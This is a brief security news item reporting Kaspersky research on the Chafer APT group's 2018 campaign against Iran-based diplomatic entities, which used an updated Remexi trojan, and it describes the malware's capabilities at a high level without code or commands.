Delaware, USA – February 1, 2019 – Kaspersky Lab’s security researchers published a report on the campaign targeted at Iran-based foreign diplomatic entities by the Chafer APT group. The campaign was conducted in the fall of 2018; adversaries spread an improved version of the Remexi trojan, created in six months before the start of the campaign. The researchers were unable to establish how the malware got into the systems, but in one of the infections, the AutoIt script was used to download a trojan from the group’s FTP server. Remexi is a modular malware that has been used by the Chafer group since 2015. Its main functions include stealing user credentials and browser history, taking screenshots and executing commands. All communication with the command and control server and data exfiltration is carried out using a legitimate Microsoft Background Intelligent Transfer Service mechanism.
Experts admit that the latest findings may indicate that the activities of the Chafer group started much earlier than 2015, as was previously thought. This APT group is primarily engaged in internal operations, occasionally conducting campaigns against Iran’s closest neighbors. Also, previously, the group was attributed to the operations that were carried out by another Iranian APT group (APT39), which collected the personal data of the victims through attacks on telecommunications and travel companies. To detect sophisticated attacks on your infrastructure leveraging available security tools, you can use the Sysmon Framework and Threat Hunting Framework rule packs.